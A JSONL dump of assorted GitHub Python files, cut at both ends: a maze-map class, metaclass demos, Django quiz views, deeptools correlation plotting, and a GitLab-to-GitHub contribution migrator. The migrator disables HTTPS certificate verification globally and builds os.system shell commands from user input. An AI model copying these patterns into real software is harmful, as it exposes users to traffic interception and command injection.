(wn.nodes[pipe.end_node_name].transient_node_type,\n wn.nodes[pipe.end_node_name])\n\n return links1, links2, utype, dtype","repo_name":"glorialulu/TSNet","sub_path":"tsnet/network/topology.py","file_name":"topology.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"71"}
+{"seq_id":"44859195193","text":"\n\"\"\"Karttaruutu ja algoritmit hakevat kartat täältä\n kartta palautetaan yhden funktion avulla\n\"\"\"\n\nclass Kartat:\n\n def __init__(self):\n \"\"\"Alustetaan kolme käytössä olevaa karttaa ja\n testissä oleva kartta\n \"\"\"\n self.map1 = [\n \"ooopoooppo\",\n \"oooppooopo\",\n \"ppopoppopo\",\n \"opopoooopo\",\n \"oooppooooo\",\n \"oooooooopp\",\n \"ooooppoopo\",\n \"oopoopoooo\",\n \"ooopooopoo\",\n \"ooppoooppo\"]\n self.map2 = [\n \"opoooooopoooooo\",\n \"opoppppopppppop\",\n \"ooopoooopoooooo\",\n \"opoooppppoppppp\",\n \"opopopooooooooo\",\n \"opopoooppoopppo\",\n \"ooopppppooopooo\",\n \"ppopopopppppopp\",\n \"opooopooooooopo\",\n \"opopoooopoopopo\",\n \"oppppppoppppppo\",\n \"oopooopoooooooo\",\n \"pooopooooppppoo\",\n \"poppppopopoopop\",\n \"oopoooopoppoooo\"]\n self.map3 = [\n \"opoooooopooooooooooo\",\n \"oooooopoppppopppppop\",\n \"opopooooooooopoooooo\",\n \"opoooppppooooooppppp\",\n \"opopopoooooooooooooo\",\n \"opoooopopoooppoopppo\",\n \"opopppoooooopooopooo\",\n \"ppopppppopppppoppppp\",\n \"opooopooooooopoooooo\",\n \"ooopoppppppoopoopopo\",\n \"oppppopoooppoppppppo\",\n \"oopooopooooooooooooo\",\n \"pooopoooopppppoooooo\",\n \"pooooooppppopppoooop\",\n \"oooooopopooooooopooo\",\n \"oppppoooooppoppppppo\",\n \"oopooopoooooopoooooo\",\n \"pooopoooopopppoooooo\",\n \"poooppppppoooopoopoo\",\n \"oopooooooooopooooppo\"]\n self.map_test = [\"oo\", \"oo\"]\n\n def maps(self, map_number):\n \"\"\"Funktio kartan palauttamista varten.\n Kutsutaan kartan numerolla ja palautetaan vastaava kartta\n \"\"\"\n if map_number == 1:\n return self.map1\n if map_number == 2:\n return self.map2\n if map_number == 3:\n return self.map3\n return self.map_test\n","repo_name":"hartonenolli/Reitinhaku_TiRa","sub_path":"src/kartat/kartta1.py","file_name":"kartta1.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15927938437","text":"from collections import abc\n\n\nclass Meta(type):\n def some_method(cls):\n return \"some_string\"\n\n\nclass Something(metaclass=Meta):\n attr = 42\n\n\nclass WithoutMeta():\n pass\n\n\nprint(type(Something)) # \nprint(type(Meta)) # \nprint(type(WithoutMeta)) # \nprint(Something.some_method())\n# print(Something().some_method()) # AttributeError: 'Something' object has no attribute 'some_method'\nprint(issubclass(list, abc.Sequence)) # True\nprint(isinstance([], abc.Hashable)) # False\n\n\ndef flatten(obj):\n for item in obj:\n if isinstance(item, abc.Iterable):\n yield from flatten(item)\n else:\n yield item","repo_name":"q3dm17/python","sub_path":"tools/metaclasses_tests.py","file_name":"metaclasses_tests.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"3942597801","text":"#!/usr/bin/python\nfrom urllib.request import urlopen, Request\nfrom tqdm import tqdm\nimport os, collections, ssl, sys, json\n\n# States\nSTATE_INIT = 'Fetching GitLab events...'\nSTATE_EMPTY = 'Could not fetch events. Do you have commits or a public profile?'\nSTATE_LOAD = 'Creating commits...'\nSTATE_DONE = 'Done!\\nGitHub status:'\nGIT_STATUS = 'git status --ahead-behind'\n\n# Values\nCOUNTER = 'i'\nCOMMITS_COUNT = 'commitsCount'\nCOMMIT_FILE = 'commit.md'\nDATE_FORMAT = '%Y-%m-%d'\nLAST_COMMIT = 'lastCommit'\nREAD = 'r'\nUNIX_EPOCH = '1970-01-01'\nUSER = 'user'\nUSER_AGENT_KEY = 'User-Agent'\nUSER_AGENT_VALUE = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'\n\n# OS\nWINDOWS_NAME = 'nt'\nWINDOWS_DUMP_PATH = 'NUL'\nWINDOWS_SETTER = 'set'\nUNIX_DUMP_PATH = '/dev/null'\nUNIX_SETTER = 'export'\n\n# Errors\nERROR_FETCH_DATA = '''Could not fetch data from user {}\nAre you sure that your user is correct and profile is public?'''\nERROR_ARGUMENTS = '''Arguments are wrong! Try running:\nmigrator.py [initialDate]\nusername: GitLab public username profile\ninitialDate(optional): Start commit date in YYYY-MM-DD format'''\n\ndef main(argv):\n print(STATE_INIT)\n profile = Profile.build(argv)\n\n if not profile.events:\n print(STATE_EMPTY)\n return\n\n print(STATE_LOAD)\n profile.createCommits()\n\n print(STATE_DONE)\n os.system(GIT_STATUS)\n\nclass Profile:\n def __init__(self, user, baseEvent):\n self.user = user\n self.baseEvent = baseEvent\n self.fetchEvents()\n \n @classmethod\n def build(self, args):\n try:\n if os.path.exists(COMMIT_FILE):\n # Read data from md file\n return Profile.fromLocal()\n else:\n # Get data from arguments\n return Profile.fromArgs(args)\n except:\n print(ERROR_ARGUMENTS)\n exit()\n \n @classmethod\n def fromLocal(self):\n file = open(COMMIT_FILE, READ)\n data = json.loads(file.read())\n \n args = []\n # Parse json into list of args\n for item in data:\n args.append(item)\n\n return Profile.fromArgs(args)\n \n @classmethod\n def fromArgs(self, args):\n user = args[1]\n baseEvent = Event.fromArgs(args)\n \n return Profile(user, baseEvent)\n\n def fetchEvents(self):\n # Sign default certificate to allow https request\n ssl._create_default_https_context = ssl._create_unverified_context\n\n # Headers to pass GitLab validation simulating a browser\n headers = { USER_AGENT_KEY : USER_AGENT_VALUE }\n \n # URL to fetch user commits data from calendar.json\n url = f'https://gitlab.com/users/{self.user}/calendar.json'\n\n try:\n # Send request from URL and Headers\n request = urlopen(Request(url = url, headers = headers))\n \n # Fetch successful decoded response\n response = request.read().decode()\n\n # Dump response into python object\n data = json.loads(response)\n except:\n print(ERROR_FETCH_DATA.format(self.user))\n exit()\n \n events = self.parseResponse(data.items())\n \n self.events = sorted(events)\n \n def parseResponse(self, items):\n events = []\n # Parse json into list of Events\n for date, count in items:\n event = Event(date, count)\n baseEvent = self.baseEvent\n\n if baseEvent > event:\n # Filter events before point zero event\n continue\n\n if baseEvent == event:\n # Remove already commited contributions\n event.commitsCount -= baseEvent.commitsCount\n \n events.append(event)\n\n return events\n \n def createCommits(self):\n for event in tqdm(self.events):\n event.createCommits(self.user)\n \nclass Event:\n def __init__(self, date = UNIX_EPOCH, count = 0):\n self.dateString = date \n self.commitsCount = count\n\n def __eq__(self, other):\n return self.dateString == other.dateString\n\n def __lt__(self, other):\n return self.dateString < other.dateString\n\n @classmethod\n def fromArgs(self, args):\n if len(args) == 4:\n return Event(args[2], args[3])\n \n if len(args) == 3:\n return Event(args[2])\n \n return Event()\n \n def createCommits(self, user):\n # Get dump path variable to hide commit messages based on OS\n dumpPath = WINDOWS_DUMP_PATH if os.name == WINDOWS_NAME else UNIX_DUMP_PATH\n\n for i in range(self.commitsCount):\n message = self.toMessage(user, i + 1)\n \n # Echo message into md to enable commit of modified file\n os.system(f'echo {json.dumps(message)} >> {COMMIT_FILE}')\n\n # Add file and do commit to GitHub\n os.system(f'git add {COMMIT_FILE}')\n os.system(f'git commit --date=\"{self.dateString} 12:00:00\" -m \"{message}\" > {dumpPath}')\n\n\n def toMessage(self, user, i):\n data = {}\n data[COUNTER] = i\n data[USER] = user\n data[LAST_COMMIT] = self.dateString\n data[COMMITS_COUNT] = self.commitsCount\n \n return json.dumps(data)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"ericloureiro/gitlab-contribution-migration-tool","sub_path":"migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"1956274811","text":"from django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom django.utils import simplejson\n\nfrom grammar.models import Grammar,Choice\n\nimport collections\n\ndef index(request):\n return render(request, 'grammar/base.html')\n\ndef list(request):\n grammar_list = Grammar.objects.all().order_by('-pub_date')\n context = {'grammar_list': grammar_list}\n return render(request, 'grammar/list.html', context)\n\ndef ajaxList(request):\n grammar_list = Grammar.objects.all().order_by('-pub_date')\n results={}\n next = Grammar.objects.order_by('?')[0]\n shuffle=next.pk\n nlist=[]\n plist=[]\n count=0\n for item in grammar_list:\n nlist.append(item.nick)\n plist.append(item.pk)\n count+=1\n results['count']=count\n results['nicks']=nlist\n results['pks']=plist\n results['shuffle']=shuffle\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\ndef ajaxDetail(request, grammar_id):\n return render(request, 'grammar/base.html', {'id':grammar_id})\n\ndef detail(request, grammar_id):\n grammar_sel = get_object_or_404(Grammar, pk=grammar_id)\n pk=grammar_sel.pk\n return render(request, 'grammar/view.html', {'id':pk})\n\ndef detailJSON(request, grammar_id):\n results = {'success':False}\n grammar_sel = get_object_or_404(Grammar, pk=grammar_id)\n choices = grammar_sel.choice_set.all()\n alist=[]\n clist=[]\n ilist=[]\n chara='A'\n for choice in choices:\n alist.append(chara)\n clist.append(choice.choice_text)\n ilist.append(choice.pk)\n chara=chr(ord(chara) + 1)\n next = Grammar.objects.order_by('?')[0]\n while next == grammar_sel:\n next = Grammar.objects.order_by('?')[0]\n results['next']=next.pk\n results['nickname'] = grammar_sel.nick\n results['question_1st'] = grammar_sel.question_1st\n results['question_2nd'] = grammar_sel.question_2nd\n results['labels'] = alist\n results['choices'] = clist\n results['choices_id'] = ilist\n\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\ndef choose(request,pk):\n results = {'success':False}\n answer = False;\n choice = get_object_or_404(Choice, pk=pk)\n if choice.is_correct:\n answer = True\n results['answer'] = answer\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')","repo_name":"andyfangdzarchive/My-SAT-Life","sub_path":"grammar/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4124530477","text":"from typing import cast\nfrom utils import print_error, check_number_of_args, cast_value\nimport sys\n\ndef read_id(instr, ids):\n \"\"\"\n Reads a boolean or integer literal.\n If introduced type is incorrect, will ignore and report an error.\n \"\"\"\n\n # check that we have an id to store the value\n if not check_number_of_args(instr, 2):\n return\n \n # look for id\n id = instr[1]\n\n # get user input\n value = input(f'Por favor, ingrese un valor para el identificador {id}. ' +\n '(Entero o true/false): ')\n\n # check if the entered value has a valid type\n casted_value = cast_value(value)\n if casted_value == None:\n print_error('El valor introducido no es un literal entero o booleano.' + \\\n f' Valor: {value}')\n return\n\n # assign the value to the id\n ids[id] = casted_value\n\ndef print_id(instr, ids):\n \"\"\"\n Prints the value that has been assigned to an id.\n If no value has been assigned, ignores and reports an error.\n \"\"\"\n\n # check that we have an id print a value\n if len(instr) < 2:\n print(f'Instrucción inválida. Instrucción {instr}')\n return\n\n # gets the id\n id = instr[1]\n\n # checks if the has a value\n if not id in ids or ids[id] == None:\n print_error('No ha sido asignado ningún valor para este identificador.' + \\\n f' Identificador: {id}')\n else:\n print(f'\\033[1;37mIdentificador:\\033[0m {id}, \\033[1;37mValor:\\033[0m {ids[id]}')\n","repo_name":"mfaria724/ci4721-exam2","sub_path":"pregunta6/io_instr.py","file_name":"io_instr.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"25622346142","text":"# Напишите программу, которая найдёт произведение пар чисел списка.\n# Парой считаем первый и последний элемент, второй и предпоследний и т.д.\n# in\n# 4\n# out\n# [2, 5, 8, 10]\n# [20, 40]\n# in\n# 5\n# out\n# [2, 2, 4, 8, 8]\n# [16, 16, 4]\n\nfrom random import sample\nnum = int(input('Введите количество элементов: '))\nnew_list = sample (range (1, num * 2), num)\nprint(new_list)\n\ndef product_of_numbers (num_list):\n new_numbers = []\n for i in range (len(num_list) // 2):\n new_numbers.append (num_list[i] * num_list[-1 - i])\n if len(num_list) % 2 != 0:\n new_numbers.append (num_list[len(num_list) // 2])\n return new_numbers\n else:\n return new_numbers\n \nnew_num_list = product_of_numbers (new_list)\nprint (new_num_list)","repo_name":"kolosova-anna/python","sub_path":"homework_3/hw_32.py","file_name":"hw_32.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36783529850","text":"import sys\nimport itertools\nimport copy\nimport numpy as np\nimport scipy.cluster.hierarchy as sch\nimport scipy.stats\nimport matplotlib as mpl\nmpl.use('Agg')\nmpl.rcParams['pdf.fonttype'] = 42\nmpl.rcParams['svg.fonttype'] = 'none'\nfrom deeptools import cm # noqa: F401\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.ticker\nimport matplotlib.mlab\nimport matplotlib.markers\nimport matplotlib.colors as pltcolors\nfrom deeptools.utilities import toString, convertCmap\n\nimport plotly.offline as offline\nimport plotly.graph_objs as go\nimport plotly.figure_factory as ff\n\n\nold_settings = np.seterr(all='ignore')\n\n\nclass Correlation:\n \"\"\"\n class to work with matrices\n having sample data\n to compute correlations, plot\n them and make scatter plots\n \"\"\"\n\n def __init__(self, matrix_file,\n corr_method=None,\n labels=None,\n remove_outliers=False,\n skip_zeros=False,\n log1p=False):\n\n self.load_matrix(matrix_file)\n self.skip_zeros = skip_zeros\n self.corr_method = corr_method\n self.corr_matrix = None # correlation matrix\n self.column_order = None\n self.rowCenter = False\n if labels is not None:\n # test that the length of labels\n # corresponds to the length of\n # samples\n\n self.labels = labels\n self.labels = [toString(x) for x in self.labels]\n\n if self.matrix.shape[1] == 1:\n # There's nothing that can be done with a single sample\n sys.exit(\"\\nPlease use a matrix with more than one sample\\n\")\n\n if skip_zeros is True:\n # remove rows containing only nans or zeros\n # that could be unmappable regions.\n self.remove_rows_of_zeros()\n\n if remove_outliers is True:\n # remove outliers, otherwise outliers will produce a very\n # high pearson correlation. Unnecessary for spearman correlation\n self.remove_outliers()\n\n if log1p is True:\n self.matrix = np.log1p(self.matrix)\n\n if corr_method:\n self.compute_correlation()\n\n def load_matrix(self, matrix_file):\n \"\"\"\n loads a matrix file saved using the numpy\n savez method. Two keys are expected:\n 'matrix' and 'labels'. The matrix should\n contain one sample per row\n \"\"\"\n\n _ma = np.load(matrix_file)\n # matrix: cols correspond to samples\n self.matrix = np.asarray(_ma['matrix'].tolist())\n if np.any(np.isnan(self.matrix)):\n num_nam = len(np.flatnonzero(np.isnan(self.matrix.flatten())))\n sys.stderr.write(\"*Warning*. {} NaN values were found. They will be removed along with the \"\n \"corresponding bins in other samples for the computation \"\n \"and plotting\\n\".format(num_nam))\n\n self.matrix = np.ma.compress_rows(np.ma.masked_invalid(self.matrix))\n\n self.labels = list(map(toString, _ma['labels']))\n\n assert len(self.labels) == self.matrix.shape[1], \"ERROR, length of labels is not equal \" \\\n \"to length of matrix samples\"\n\n @staticmethod\n def get_outlier_indices(data, max_deviation=200):\n \"\"\"\n The method is based on the median absolute deviation. See\n Boris Iglewicz and David Hoaglin (1993),\n \"Volume 16: How to Detect and Handle Outliers\",\n The ASQC Basic References in Quality Control:\n Statistical Techniques, Edward F. Mykytka, Ph.D., Editor.\n\n returns the list, without the outliers\n\n The max_deviation=200 is like selecting a z-score\n larger than 200, just that it is based on the median\n and the median absolute deviation instead of the\n mean and the standard deviation.\n \"\"\"\n median = np.median(data)\n b_value = 1.4826 # value set for a normal distribution\n mad = b_value * np.median(np.abs(data))\n outliers = []\n if mad > 0:\n deviation = abs(data - median) / mad\n \"\"\"\n outliers = data[deviation > max_deviation]\n print \"outliers removed {}\".format(len(outliers))\n print outliers\n \"\"\"\n outliers = np.flatnonzero(deviation > max_deviation)\n return outliers\n\n def remove_outliers(self, verbose=True):\n \"\"\"\n get the outliers *per column* using the median absolute\n deviation method\n\n Returns the filtered matrix\n \"\"\"\n\n unfiltered = len(self.matrix)\n to_remove = None\n for col in self.matrix.T:\n outliers = self.get_outlier_indices(col)\n if to_remove is None:\n to_remove = set(outliers)\n else:\n # only set to remove those bins in which\n # the outliers are present in all cases (colums)\n # that's why the intersection is used\n to_remove = to_remove.intersection(outliers)\n if len(to_remove):\n to_keep = [x for x in range(self.matrix.shape[0])\n if x not in to_remove]\n self.matrix = self.matrix[to_keep, :]\n if verbose:\n sys.stderr.write(\n \"total/filtered/left: \"\n \"{}/{}/{}\\n\".format(unfiltered,\n unfiltered - len(to_keep),\n len(to_keep)))\n\n return self.matrix\n\n def remove_rows_of_zeros(self):\n # remove rows containing all zeros or all nans\n _mat = np.nan_to_num(self.matrix)\n to_keep = _mat.sum(1) != 0\n\n self.matrix = self.matrix[to_keep, :]\n\n def save_corr_matrix(self, file_handle):\n \"\"\"\n saves the correlation matrix\n \"\"\"\n if self.column_order:\n self.corr_matrix = self.corr_matrix[:, self.column_order][self.column_order]\n self.labels = [self.labels[i] for i in self.column_order]\n\n self.labels = [toString(x) for x in self.labels]\n file_handle.write(\"\\t'\" + \"'\\t'\".join(self.labels) + \"'\\n\")\n fmt = \"\\t\".join(np.repeat('%.4f', self.corr_matrix.shape[1])) + \"\\n\"\n i = 0\n for row in self.corr_matrix:\n file_handle.write(\n \"'%s'\\t\" % self.labels[i] + fmt % tuple(row))\n i += 1\n\n def compute_correlation(self):\n \"\"\"\n computes spearman or pearson\n correlation for the samples in the matrix\n\n The matrix should contain the values of each sample per column\n that's why the transpose is used.\n\n >>> matrix = np.array([[1, 2, 3, np.nan],\n ... [1, 2, 3, 4],\n ... [6, 4, 3, 1]]).T\n >>> np.savez_compressed(\"/tmp/test_matrix.npz\", matrix=matrix, labels=['a', 'b', 'c'])\n\n >>> c = Correlation(\"/tmp/test_matrix.npz\", corr_method='pearson')\n\n the results should be as in R\n\n >>> c.compute_correlation().filled(np.nan)\n array([[ 1. , 1. , -0.98198051],\n [ 1. , 1. , -0.98198051],\n [-0.98198051, -0.98198051, 1. ]])\n >>> c.corr_method = 'spearman'\n >>> c.corr_matrix = None\n >>> c.compute_correlation()\n array([[ 1., 1., -1.],\n [ 1., 1., -1.],\n [-1., -1., 1.]])\n \"\"\"\n if self.corr_matrix is not None:\n return self.corr_matrix\n\n num_samples = len(self.labels)\n # initialize correlation matrix\n\n if self.corr_method == 'pearson':\n self.corr_matrix = np.ma.corrcoef(self.matrix.T, allow_masked=True)\n\n else:\n corr_matrix = np.zeros((num_samples, num_samples), dtype='float')\n # do an all vs all correlation using the\n # indices of the upper triangle\n rows, cols = np.triu_indices(num_samples)\n\n for index in range(len(rows)):\n row = rows[index]\n col = cols[index]\n corr_matrix[row, col] = scipy.stats.spearmanr(self.matrix[:, row], self.matrix[:, col])[0]\n # make the matrix symmetric\n self.corr_matrix = corr_matrix + np.triu(corr_matrix, 1).T\n\n return self.corr_matrix\n\n def plotly_correlation(self, corr_matrix, plot_filename, labels, plot_title='',\n vmax=None, vmin=None, plot_numbers=True,\n colormap='jet'):\n \"\"\"plot_correlation, but using plotly\"\"\"\n textElement = []\n for row in range(corr_matrix.shape[0]):\n trow = []\n for col in range(corr_matrix.shape[0]):\n if plot_numbers:\n trow.append(\"{:0.2f}\".format(corr_matrix[row, col]))\n else:\n trow.append('')\n textElement.append(trow)\n\n zauto = True\n if vmax is not None or vmin is not None:\n zauto = False\n\n convertedCmap = convertCmap(colormap)\n fig = ff.create_annotated_heatmap(corr_matrix, x=labels, y=labels, colorscale=convertedCmap, showscale=True, zauto=zauto, zmin=vmin, zmax=vmax, annotation_text=textElement)\n fig.layout['title'] = plot_title\n offline.plot(fig, filename=plot_filename, auto_open=False)\n\n def plot_correlation(self, plot_filename, plot_title='', vmax=None,\n vmin=None, colormap='jet', image_format=None,\n plot_numbers=False, plotWidth=11, plotHeight=9.5):\n \"\"\"\n plots a correlation using a symmetric heatmap\n \"\"\"\n num_rows = len(self.labels)\n corr_matrix = self.compute_correlation()\n # set a font size according to figure length\n if num_rows < 6:\n font_size = 14\n elif num_rows > 40:\n font_size = 5\n else:\n font_size = int(14 - 0.25 * num_rows)\n mpl.rcParams.update({'font.size': font_size})\n # set the minimum and maximum values\n if vmax is None:\n vmax = 1\n if vmin is None:\n vmin = 0 if corr_matrix .min() >= 0 else -1\n\n # Compute and plot dendrogram.\n fig = plt.figure(figsize=(plotWidth, plotHeight))\n plt.suptitle(plot_title)\n\n axdendro = fig.add_axes([0.015, 0.1, 0.1, 0.7])\n axdendro.set_axis_off()\n y_var = sch.linkage(corr_matrix, method='centroid')\n z_var = sch.dendrogram(y_var, orientation='left',\n link_color_func=lambda k: 'darkred')\n axdendro.set_xticks([])\n axdendro.set_yticks([])\n cmap = copy.copy(plt.get_cmap(colormap))\n\n # this line simply makes a new cmap, based on the original\n # colormap that goes from 0.0 to 0.9\n # This is done to avoid colors that\n # are too dark at the end of the range that do not offer\n # a good contrast between the correlation numbers that are\n # plotted on black.\n if plot_numbers:\n cmap = pltcolors.LinearSegmentedColormap.from_list(colormap + \"clipped\",\n cmap(np.linspace(0, 0.9, 10)))\n\n cmap.set_under((0., 0., 1.))\n # Plot distance matrix.\n axmatrix = fig.add_axes([0.12, 0.1, 0.6, 0.7])\n index = z_var['leaves']\n corr_matrix = corr_matrix[index, :]\n corr_matrix = corr_matrix[:, index]\n if corr_matrix.shape[0] > 30:\n # when there are too many rows it is better to remove\n # the black lines surrounding the boxes in the heatmap\n edge_color = 'none'\n else:\n edge_color = 'black'\n\n if image_format == \"plotly\":\n self.plotly_correlation(corr_matrix,\n plot_filename,\n self.labels,\n plot_title=plot_title,\n vmax=vmax,\n vmin=vmin,\n colormap=colormap,\n plot_numbers=plot_numbers)\n return\n\n img_mat = axmatrix.pcolormesh(corr_matrix,\n edgecolors=edge_color,\n cmap=cmap,\n vmax=vmax,\n vmin=vmin)\n axmatrix.set_xlim(0, num_rows)\n axmatrix.set_ylim(0, num_rows)\n\n axmatrix.yaxis.tick_right()\n axmatrix.set_yticks(np.arange(corr_matrix .shape[0]) + 0.5)\n axmatrix.set_yticklabels(np.array(self.labels).astype('str')[index])\n\n axmatrix.xaxis.set_tick_params(labeltop=True)\n axmatrix.xaxis.set_tick_params(labelbottom=False)\n axmatrix.set_xticks(np.arange(corr_matrix .shape[0]) + 0.5)\n axmatrix.set_xticklabels(np.array(self.labels).astype('str')[index], rotation=45, ha='left')\n\n axmatrix.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False)\n\n axmatrix.tick_params(\n axis='y',\n which='both',\n left=False,\n right=False)\n\n # Plot colorbar\n axcolor = fig.add_axes([0.12, 0.065, 0.6, 0.02])\n cobar = plt.colorbar(img_mat, cax=axcolor, orientation='horizontal')\n cobar.solids.set_edgecolor(\"face\")\n if plot_numbers:\n for row in range(num_rows):\n for col in range(num_rows):\n axmatrix.text(row + 0.5, col + 0.5,\n \"{:.2f}\".format(corr_matrix[row, col]),\n ha='center', va='center')\n\n self.column_order = index\n fig.savefig(plot_filename, format=image_format)\n plt.close()\n\n def plotly_scatter(self, plot_filename, corr_matrix, plot_title='', minXVal=None, maxXVal=None, minYVal=None, maxYVal=None):\n \"\"\"Make the scatter plot of a matrix with plotly\"\"\"\n n = self.matrix.shape[1]\n self.matrix = self.matrix\n fig = go.Figure()\n domainWidth = 1. / n\n\n annos = []\n for i in range(n):\n x = domainWidth * (i + 1)\n y = 1 - (domainWidth * i + 0.5 * domainWidth)\n anno = dict(text=self.labels[i], showarrow=False, xref='paper', yref='paper', x=x, y=y, xanchor='right', yanchor='middle')\n annos.append(anno)\n\n data = []\n zMin = np.inf\n zMax = -np.inf\n for x in range(n):\n xanchor = 'x{}'.format(x + 1)\n base = x * domainWidth\n domain = [base, base + domainWidth]\n if x > 0:\n base = 1 - base\n fig['layout']['xaxis{}'.format(x + 1)] = dict(domain=domain, range=[minXVal, maxXVal], anchor='free', position=base)\n for y in range(0, n):\n yanchor = 'y{}'.format(y + 1)\n if x == 1:\n base = 1 - y * domainWidth\n domain = [base - domainWidth, base]\n fig['layout']['yaxis{}'.format(y + 1)] = dict(domain=domain, range=[minYVal, maxYVal], side='right', anchor='free', position=1.0)\n\n if x > y:\n vector1 = self.matrix[:, x]\n vector2 = self.matrix[:, y]\n Z, xEdges, yEdges = np.histogram2d(vector1, vector2, bins=50)\n Z = np.log10(Z)\n if np.min(Z) < zMin:\n zMin = np.min(Z)\n if np.max(Z) > zMax:\n zMax = np.max(Z)\n name = '{}={:.2f}'.format(self.corr_method, corr_matrix[x, y])\n trace = go.Heatmap(z=Z, x=xEdges, y=yEdges, showlegend=False, xaxis=xanchor, yaxis=yanchor, name=name, showscale=False)\n data.append(trace)\n\n # Fix the colorbar bounds\n for trace in data:\n trace.update(zmin=zMin, zmax=zMax)\n data[-1]['colorbar'].update(title=\"log10(instances per bin)\", titleside=\"right\")\n data[-1].update(showscale=True)\n\n fig.add_traces(data)\n fig['layout'].update(title=plot_title, showlegend=False, annotations=annos)\n\n offline.plot(fig, filename=plot_filename, auto_open=False)\n\n def plot_scatter(self, plot_filename, plot_title='', image_format=None, log1p=False, xRange=None, yRange=None):\n \"\"\"\n Plot the scatter plots of a matrix\n in which each row is a sample\n \"\"\"\n\n num_samples = self.matrix.shape[1]\n corr_matrix = self.compute_correlation()\n grids = gridspec.GridSpec(num_samples, num_samples)\n grids.update(wspace=0, hspace=0)\n fig = plt.figure(figsize=(2 * num_samples, 2 * num_samples))\n plt.rcParams['font.size'] = 8.0\n plt.suptitle(plot_title)\n if log1p is True:\n self.matrix = np.log1p(self.matrix)\n min_xvalue = self.matrix.min()\n max_xvalue = self.matrix.max()\n min_yvalue = min_xvalue\n max_yvalue = max_xvalue\n if xRange is not None:\n min_xvalue = xRange[0]\n max_xvalue = xRange[1]\n if yRange is not None:\n min_yvalue = yRange[0]\n max_yvalue = yRange[1]\n if (min_xvalue % 2 == 0 and max_xvalue % 2 == 0) or \\\n (min_xvalue % 1 == 0 and max_xvalue % 2 == 1):\n # make one value odd and the other even\n max_xvalue += 1\n if (min_yvalue % 2 == 0 and max_yvalue % 2 == 0) or \\\n (min_yvalue % 1 == 0 and max_yvalue % 2 == 1):\n # make one value odd and the other even\n max_yvalue += 1\n\n # plotly output\n if image_format == 'plotly':\n self.plotly_scatter(plot_filename, corr_matrix, plot_title=plot_title, minXVal=min_xvalue, maxXVal=max_xvalue, minYVal=min_yvalue, maxYVal=max_yvalue)\n return\n\n rows, cols = np.triu_indices(num_samples)\n\n for index in range(len(rows)):\n row = rows[index]\n col = cols[index]\n if row == col:\n # add titles as\n # empty plot in the diagonal\n ax = fig.add_subplot(grids[row, col])\n ax.text(0.5, 0.5, self.labels[row],\n verticalalignment='center',\n horizontalalignment='center',\n fontsize=10, fontweight='bold',\n transform=ax.transAxes)\n ax.set_axis_off()\n continue\n\n ax = fig.add_subplot(grids[row, col])\n\n vector1 = self.matrix[:, row]\n vector2 = self.matrix[:, col]\n\n ax.text(0.2, 0.8, \"{}={:.2f}\".format(self.corr_method,\n corr_matrix[row, col]),\n horizontalalignment='left',\n transform=ax.transAxes)\n ax.get_yaxis().set_tick_params(\n which='both',\n left=False,\n right=False,\n direction='out')\n\n ax.get_xaxis().set_tick_params(\n which='both',\n top=False,\n bottom=False,\n direction='out')\n ax.get_xaxis().set_tick_params(\n which='major',\n labelrotation=45)\n\n if col != num_samples - 1:\n ax.set_yticklabels([])\n else:\n ax.yaxis.tick_right()\n ax.get_yaxis().set_tick_params(\n which='both',\n left=False,\n right=True,\n direction='out')\n if col - row == 1:\n ax.xaxis.tick_bottom()\n ax.get_xaxis().set_tick_params(\n which='both',\n top=False,\n bottom=True,\n direction='out')\n ax.get_xaxis().set_tick_params(\n which='major',\n labelrotation=45)\n\n else:\n ax.set_xticklabels([])\n\n ax.set_xlim(min_xvalue, max_xvalue)\n ax.set_ylim(min_yvalue, max_yvalue)\n ax.hist2d(vector2, vector1, bins=200, cmin=0.1)\n\n plt.savefig(plot_filename, format=image_format)\n plt.close()\n\n def plotly_pca(self, plotFile, Wt, pvar, PCs, eigenvalues, cols, plotTitle):\n \"\"\"\n A plotly version of plot_pca, that's called by it to do the actual plotting\n \"\"\"\n fig = go.Figure()\n fig['layout']['xaxis1'] = {'domain': [0.0, 0.48], 'anchor': 'x1', 'title': 'PC{} ({:4.1f}% of var. explained)'.format(PCs[0], 100.0 * pvar[PCs[0] - 1])}\n fig['layout']['yaxis1'] = {'domain': [0.0, 1.0], 'anchor': 'x1', 'title': 'PC{} ({:4.1f}% of var. explained)'.format(PCs[1], 100.0 * pvar[PCs[1] - 1])}\n fig['layout']['xaxis2'] = {'domain': [0.52, 1.0], 'title': 'Principal Component'}\n fig['layout']['yaxis2'] = {'domain': [0.0, 1.0], 'anchor': 'x2', 'title': 'Eigenvalue', 'rangemode': 'tozero', 'showgrid': False}\n fig['layout']['yaxis3'] = {'domain': [0.0, 1.0], 'anchor': 'x2', 'title': 'Cumulative variability', 'rangemode': 'tozero', 'side': 'right', 'overlaying': 'y2'}\n fig['layout'].update(title=plotTitle)\n\n # PCA\n if cols is not None:\n colors = itertools.cycle(cols)\n n = len(self.labels)\n data = []\n for i in range(n):\n 